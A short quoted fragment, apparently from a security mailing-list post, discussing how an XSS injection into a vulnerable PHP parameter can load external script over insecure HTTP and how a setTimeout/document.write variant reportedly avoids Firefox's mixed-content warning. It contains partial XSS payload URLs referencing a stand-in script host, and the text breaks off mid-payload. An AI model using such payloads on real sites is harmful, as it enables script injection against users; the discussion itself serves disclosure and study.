MM> https://server.com/vuln.php?id=";> src="http://server2.com/xss.js";>
MM> Web Browser knows that we are trying to load something over unsecure 
protocol.
MM> However Mozilla Firefox will fail with the following example and the
MM> user will think that all the elements are "safe":
MM> https://server.com/vuln.php?id=";>setTimeout("document.write('